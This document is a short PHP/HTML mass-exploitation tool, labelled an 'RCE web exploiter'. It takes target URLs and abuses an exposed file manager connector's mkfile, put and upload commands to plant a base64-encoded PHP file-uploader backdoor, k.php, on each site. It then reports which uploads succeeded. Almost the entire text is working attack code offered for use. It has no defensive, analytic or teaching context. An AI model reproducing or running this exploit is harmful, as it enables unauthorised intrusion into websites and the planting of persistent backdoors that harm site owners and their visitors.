Hostinger nazuka RCE web exploiter

1. <html>
2. <title>Hostinger</title>
3. <u><i><b><h1>&copy; AZZATSSINS CYBERSERKERS</h1>
4. </b></i></u><br>
5. <style type="text/css">
6. html {
7.     text-align: center;
8. }
9. a {
10.     text-decoration: none;
11.     color: black;
12. }
13. </style>
14. <form method="post">
15. Target: <br>
16. <textarea name="target" placeholder="http://www.target.com/" style="width: 600px; height: 250px; margin: 5px auto; resize: none;"></textarea><br>
17. <input type="submit" name="x" style="width: 150px; height: 25px; margin: 5px;" value="hajar">
18. </form>
19. </html>
20. <?php
21. function ngirim($url, $isi) {
22. $ch = curl_init ("$url");
23.       curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
24.       curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
25.       curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
26.       curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
27.       curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
28.       curl_setopt ($ch, CURLOPT_POST, 1);
29.       curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
30.       curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
31.       curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
32. $data3 = curl_exec ($ch);
33. return $data3;
34. }
35. $target = explode("\r\n", $_POST['target']);
36. if($_POST['x']) {
37.     foreach($target as $azzatssins) {
38.     $korban = $azzatssins."/_file-manager/php/connector.php";
39.         $nama_doang = "k.php";
40.         $isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
41.         $decode_isi = base64_decode($isi_nama_doang);
42.         $encode = base64_encode($nama_doang);
43.         $fp = fopen($nama_doang,"w");
44.         fputs($fp, $decode_isi);
45.         echo "[+] <a href='$korban' target='_blank'>$korban</a> <br>";
46.         echo "# Upload[1] ......<br>";
47.         $url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";
48.         $b = file_get_contents("$url_mkfile");
49.         $post1 = array(
50.                 "cmd" => "put",
51.                 "target" => "l1_$encode",
52.                 "content" => "$decode_isi",
53.                 );
54.         $post2 = array(
55.                 "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
56.                 "upload[]" => "@$nama_doang",);
57.         $output_mkfile = ngirim("$korban", $post1);
58.         if(preg_match("/$nama_doang/", $output_mkfile)) {
59.             echo "# Upload Success 1... => $nama_doang<br>#<br><br>";
60.         } else {
61.             echo "# Upload Failed 1 <br># Uploading 2..<br>";
62.             $upload_ah = ngirim("$korban?cmd=upload", $post2);
63.             if(preg_match("/$nama_doang/", $upload_ah)) {
64.                 echo "# Upload Success 2 => $nama_doang<br>#<br><br>";
65.             } else {
66.                 echo "# Upload Failed 2<br><br>";
67.             }
68.         }
69.     }
70. }
71. ?>